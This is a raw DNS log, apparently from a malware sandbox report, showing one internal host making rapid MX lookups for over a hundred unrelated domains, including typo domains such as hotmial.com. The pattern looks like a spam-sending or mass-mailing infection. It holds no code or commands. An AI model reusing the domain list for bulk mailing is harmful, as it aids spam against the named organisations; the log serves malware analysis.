                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.064881086 CEST9.9.9.9192.168.2.30x7269No error (0)parkbelles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.064881086 CEST9.9.9.9192.168.2.30x7269No error (0)parkbelles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.064881086 CEST9.9.9.9192.168.2.30x7269No error (0)parkbelles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.064881086 CEST9.9.9.9192.168.2.30x7269No error (0)parkbelles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.064881086 CEST9.9.9.9192.168.2.30x7269No error (0)parkbelles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.070785046 CEST8.8.4.4192.168.2.30x5369No error (0)kierson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.071125031 CEST208.67.222.222192.168.2.30x6269No error (0)mainstaycomm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.071125031 CEST208.67.222.222192.168.2.30x6269No error (0)mainstaycomm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.071554899 CEST149.112.112.112192.168.2.30x9169No error (0)doublea1991.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.073616982 CEST1.1.1.1192.168.2.30x9169No error (0)fibertel.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.087121010 CEST8.8.4.4192.168.2.30xa169No error (0)fsrinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.093039036 CEST8.8.8.8192.168.2.30xb069No error (0)hotmial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.095799923 CEST9.9.9.9192.168.2.30xb069No error (0)wesco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.095799923 CEST9.9.9.9192.168.2.30xb069No error (0)wesco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.097393990 CEST208.67.220.220192.168.2.30xb069No error (0)selectivemetals.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.097393990 CEST208.67.220.220192.168.2.30xb069No error (0)selectivemetals.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.097393990 CEST208.67.220.220192.168.2.30xb069No error (0)selectivemetals.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.097393990 CEST208.67.220.220192.168.2.30xb069No error (0)selectivemetals.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.097393990 CEST208.67.220.220192.168.2.30xb069No error (0)selectivemetals.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.099169970 CEST149.112.112.112192.168.2.30x7269No error (0)icandi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.104188919 CEST9.9.9.9192.168.2.30x5369No error (0)livejournali.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.106528044 CEST8.8.4.4192.168.2.30xc069No error (0)harrahs.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.106528044 CEST8.8.4.4192.168.2.30xc069No error (0)harrahs.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.106935024 CEST1.1.1.1192.168.2.30xc069No error (0)emails-like-snails.bidMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.106935024 CEST1.1.1.1192.168.2.30xc069No error (0)emails-like-snails.bidMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.108620882 CEST9.9.9.9192.168.2.30x9169No error (0)onelinkpr.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.108620882 CEST9.9.9.9192.168.2.30x9169No error (0)onelinkpr.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.109843969 CEST208.67.220.220192.168.2.30x7a65No error (0)bedmod.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.109843969 CEST208.67.220.220192.168.2.30x7a65No error (0)bedmod.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.109843969 CEST208.67.220.220192.168.2.30x7a65No error (0)bedmod.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.109843969 CEST208.67.220.220192.168.2.30x7a65No error (0)bedmod.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.109843969 CEST208.67.220.220192.168.2.30x7a65No error (0)bedmod.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.109843969 CEST208.67.220.220192.168.2.30x7a65No error (0)bedmod.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.112885952 CEST9.9.9.9192.168.2.30x7269No error (0)evertek.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.114159107 CEST1.0.0.1192.168.2.30xc069No error (0)hostcalls.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.114159107 CEST1.0.0.1192.168.2.30xc069No error (0)hostcalls.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.118202925 CEST208.67.222.222192.168.2.30xa169No error (0)paulbunyan.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.118630886 CEST8.8.8.8192.168.2.30x7269No error (0)vizi0n.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.119949102 CEST1.0.0.1192.168.2.30xd069No error (0)veeam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.119949102 CEST1.0.0.1192.168.2.30xd069No error (0)veeam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.119949102 CEST1.0.0.1192.168.2.30xd069No error (0)veeam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.120779991 CEST8.8.4.4192.168.2.30x7269No error (0)bhalotiainternational.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.120779991 CEST8.8.4.4192.168.2.30x7269No error (0)bhalotiainternational.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.120779991 CEST8.8.4.4192.168.2.30x7269No error (0)bhalotiainternational.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.120779991 CEST8.8.4.4192.168.2.30x7269No error (0)bhalotiainternational.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.120779991 CEST8.8.4.4192.168.2.30x7269No error (0)bhalotiainternational.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.122884989 CEST8.8.8.8192.168.2.30xd069No error (0)nktelco.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.124713898 CEST149.112.112.112192.168.2.30xd069No error (0)mail-th.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.124886036 CEST208.67.220.220192.168.2.30x9169No error (0)correiaecorreia.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.138812065 CEST8.8.4.4192.168.2.30xdf69No error (0)gtdel.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.140891075 CEST149.112.112.112192.168.2.30xa169No error (0)sbcglo0bal.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.140891075 CEST149.112.112.112192.168.2.30xa169No error (0)sbcglo0bal.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.150379896 CEST185.65.223.35192.168.2.30x4369No error (0)jees.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.150722027 CEST9.9.9.9192.168.2.30x276bNo error (0)web.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.159354925 CEST9.9.9.9192.168.2.30xc069No error (0)rxlps.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.162252903 CEST208.67.222.222192.168.2.30x276bNo error (0)icci.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.162252903 CEST208.67.222.222192.168.2.30x276bNo error (0)icci.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.165210962 CEST1.0.0.1192.168.2.30x7269No error (0)mcvts.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.165210962 CEST1.0.0.1192.168.2.30x7269No error (0)mcvts.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.166444063 CEST208.67.220.220192.168.2.30xc069No error (0)myfam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.172054052 CEST1.1.1.1192.168.2.30x5369No error (0)mailsdfeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.172054052 CEST1.1.1.1192.168.2.30x5369No error (0)mailsdfeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.175611973 CEST208.67.220.220192.168.2.30xa169No error (0)mailsadf.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.175611973 CEST208.67.220.220192.168.2.30xa169No error (0)mailsadf.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.179873943 CEST1.0.0.1192.168.2.30x9169No error (0)vipmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.179873943 CEST1.0.0.1192.168.2.30x9169No error (0)vipmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.179873943 CEST1.0.0.1192.168.2.30x9169No error (0)vipmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.179873943 CEST1.0.0.1192.168.2.30x9169No error (0)vipmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.181052923 CEST9.9.9.9192.168.2.30xd069No error (0)mcpe.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.181448936 CEST8.8.4.4192.168.2.30xd069No error (0)huskyenergy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.181448936 CEST8.8.4.4192.168.2.30xd069No error (0)huskyenergy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.182406902 CEST8.8.8.8192.168.2.30xd069No error (0)getlostxx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.182406902 CEST8.8.8.8192.168.2.30xd069No error (0)getlostxx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.184420109 CEST149.112.112.112192.168.2.30xc069No error (0)antares-design.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.185344934 CEST149.112.112.112192.168.2.30x6269No error (0)kotic.nlMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.194638968 CEST208.67.220.220192.168.2.30x186bNo error (0)mailsadf.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.194638968 CEST208.67.220.220192.168.2.30x186bNo error (0)mailsadf.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.200325966 CEST1.0.0.1192.168.2.30x276bNo error (0)naui.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.205492973 CEST9.9.9.9192.168.2.30x6269No error (0)pfizer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.205492973 CEST9.9.9.9192.168.2.30x6269No error (0)pfizer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.206967115 CEST149.112.112.112192.168.2.30x276bNo error (0)tcmri.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.240355968 CEST208.67.222.222192.168.2.30x276bNo error (0)burke.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.244666100 CEST1.1.1.1192.168.2.30xb069No error (0)mavenir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.244666100 CEST1.1.1.1192.168.2.30xb069No error (0)mavenir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.251456976 CEST8.8.8.8192.168.2.30x276bNo error (0)defran.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.251456976 CEST8.8.8.8192.168.2.30x276bNo error (0)defran.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.251456976 CEST8.8.8.8192.168.2.30x276bNo error (0)defran.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.269726992 CEST9.9.9.9192.168.2.30xd069No error (0)ovam.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.277545929 CEST8.8.4.4192.168.2.30xd069No error (0)6clo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.277545929 CEST8.8.4.4192.168.2.30xd069No error (0)6clo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.277545929 CEST8.8.4.4192.168.2.30xd069No error (0)6clo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.283560991 CEST1.1.1.1192.168.2.30x7a65No error (0)vision-bg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.289757013 CEST149.112.112.112192.168.2.30x186bNo error (0)formag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.289757013 CEST149.112.112.112192.168.2.30x186bNo error (0)formag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.289757013 CEST149.112.112.112192.168.2.30x186bNo error (0)formag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.289757013 CEST149.112.112.112192.168.2.30x186bNo error (0)formag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.289757013 CEST149.112.112.112192.168.2.30x186bNo error (0)formag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.289757013 CEST149.112.112.112192.168.2.30x186bNo error (0)formag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.294452906 CEST8.8.4.4192.168.2.30x186bNo error (0)lyon.condesa.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.315457106 CEST9.9.9.9192.168.2.30xc069No error (0)lectotum.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.315457106 CEST9.9.9.9192.168.2.30xc069No error (0)lectotum.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.315457106 CEST9.9.9.9192.168.2.30xc069No error (0)lectotum.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.315457106 CEST9.9.9.9192.168.2.30xc069No error (0)lectotum.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.325298071 CEST9.9.9.9192.168.2.30xc069No error (0)i3p.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.333889961 CEST149.112.112.112192.168.2.30x9169No error (0)plumlogo.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.372343063 CEST9.9.9.9192.168.2.30x186bNo error (0)igexsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.372343063 CEST9.9.9.9192.168.2.30x186bNo error (0)igexsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.372343063 CEST9.9.9.9192.168.2.30x186bNo error (0)igexsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.372343063 CEST9.9.9.9192.168.2.30x186bNo error (0)igexsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.372343063 CEST9.9.9.9192.168.2.30x186bNo error (0)igexsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.375787973 CEST149.112.112.112192.168.2.30x276bNo error (0)clubadriatic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.376971960 CEST1.1.1.1192.168.2.30x6269No error (0)lieblingslied-records.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.403311014 CEST208.67.222.222192.168.2.30xa169No error (0)delta.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.403311014 CEST208.67.222.222192.168.2.30xa169No error (0)delta.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.460171938 CEST1.1.1.1192.168.2.30xef69No error (0)scicom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.467767000 CEST208.67.220.220192.168.2.30xa169No error (0)littlebrown.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.470093966 CEST8.8.8.8192.168.2.30xc76dName error (3)nyrmusic.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.533382893 CEST208.67.220.220192.168.2.30x186bNo error (0)bee-s.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.537842035 CEST208.67.220.220192.168.2.30xf66dName error (3)1thecity.biznonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.553538084 CEST1.1.1.1192.168.2.30xa149Name error (3)kayoaiba.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.565846920 CEST1.1.1.1192.168.2.30x6269No error (0)sabrain.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.567477942 CEST208.67.220.220192.168.2.30x66eNo error (0)logicify.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.574556112 CEST1.0.0.1192.168.2.30xb069No error (0)nusantaramotor.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.580353022 CEST208.67.222.222192.168.2.30x5369No error (0)os.t-com.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.580353022 CEST208.67.222.222192.168.2.30x5369No error (0)os.t-com.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.580353022 CEST208.67.222.222192.168.2.30x5369No error (0)os.t-com.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.643892050 CEST208.67.222.222192.168.2.30xd069No error (0)hanaw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.651657104 CEST8.8.8.8192.168.2.30xcb6fNo error (0)icoud.com591565.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.661514997 CEST1.1.1.1192.168.2.30xb069No error (0)riminireservation.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.703860044 CEST1.0.0.1192.168.2.30x6d6fName error (3)4mail.topnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.712749004 CEST208.67.222.222192.168.2.30x7269No error (0)ch-agen-nerac.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.712749004 CEST208.67.222.222192.168.2.30x7269No error (0)ch-agen-nerac.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.712749004 CEST208.67.222.222192.168.2.30x7269No error (0)ch-agen-nerac.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.712749004 CEST208.67.222.222192.168.2.30x7269No error (0)ch-agen-nerac.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.737618923 CEST8.8.4.4192.168.2.30x2970No error (0)uoit.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.737618923 CEST8.8.4.4192.168.2.30x2970No error (0)uoit.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.737618923 CEST8.8.4.4192.168.2.30x2970No error (0)uoit.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.749727964 CEST8.8.4.4192.168.2.30x3870No error (0)bettzedek.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.749727964 CEST8.8.4.4192.168.2.30x3870No error (0)bettzedek.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.749727964 CEST8.8.4.4192.168.2.30x3870No error (0)bettzedek.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.764307022 CEST8.8.4.4192.168.2.30x7171No error (0)virusadv.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.791553020 CEST9.9.9.9192.168.2.30x2970No error (0)net-up.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.791553020 CEST9.9.9.9192.168.2.30x2970No error (0)net-up.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.791579962 CEST208.67.222.222192.168.2.30x2970No error (0)spatial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.791579962 CEST208.67.222.222192.168.2.30x2970No error (0)spatial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.799632072 CEST1.1.1.1192.168.2.30xd069No error (0)buildness.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.825967073 CEST208.67.222.222192.168.2.30x2970No error (0)power-trac.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.825967073 CEST208.67.222.222192.168.2.30x2970No error (0)power-trac.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.854809046 CEST1.0.0.1192.168.2.30x2970No error (0)starpoint.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.910218000 CEST149.112.112.112192.168.2.30x2970No error (0)whitemc.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.917795897 CEST149.112.112.112192.168.2.30x9e52No error (0)scbcameroun.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.924819946 CEST8.8.4.4192.168.2.30x2970No error (0)bt.pfMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.925954103 CEST13.107.236.208192.168.2.30x2c72No error (0)karan-carpets.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.990453005 CEST1.1.1.1192.168.2.30x193No error (0)authns1.alticeusa.net167.206.12.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.018490076 CEST208.67.222.222192.168.2.30x276bNo error (0)sportwave.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.082920074 CEST208.67.222.222192.168.2.30xef69No error (0)gybond.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.082920074 CEST208.67.222.222192.168.2.30xef69No error (0)gybond.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.161254883 CEST1.1.1.1192.168.2.30x45a1No error (0)421.ns1.above.com103.224.182.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.161254883 CEST1.1.1.1192.168.2.30x45a1No error (0)421.ns1.above.com103.224.212.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.227188110 CEST167.206.12.12192.168.2.30xa775No error (0)suddenlink.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.257555008 CEST9.9.9.9192.168.2.30x7171No error (0)jees.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.326988935 CEST1.1.1.1192.168.2.30x1804No error (0)ns8-l2.nic.ru91.217.21.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.328074932 CEST103.224.182.5192.168.2.30xba77No error (0)cho.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.346901894 CEST1.1.1.1192.168.2.30x2970No error (0)kelon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.346901894 CEST1.1.1.1192.168.2.30x2970No error (0)kelon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.346901894 CEST1.1.1.1192.168.2.30x2970No error (0)kelon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.437732935 CEST8.8.8.8192.168.2.30x704aServer failure (2)outook.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.492440939 CEST1.1.1.1192.168.2.30x9415No error (0)ns1.servconfig.com216.194.168.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.656670094 CEST198.51.44.4192.168.2.30x797aNo error (0)dfoofmail.netMX (Mail exchange)IN (0x0001)false
